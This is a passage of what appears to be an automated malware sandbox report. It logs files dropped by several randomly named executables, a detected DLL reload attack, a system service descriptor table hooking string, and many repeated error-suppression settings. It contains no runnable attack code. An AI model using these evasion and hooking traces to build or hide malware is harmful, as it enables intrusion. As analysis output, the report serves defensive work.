      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\msvcp140.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\freebl3.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\vcruntime140.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\softokn3.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file3s[1].bmp
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file3[1].bmp
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\app[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk

      Hooking and other Techniques for Hiding and Protection:

      barindex
      DLL reload attack detected
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\AE30.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
      May modify the system service descriptor table (often done to hook functions)
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0124D030 GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetLastError,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
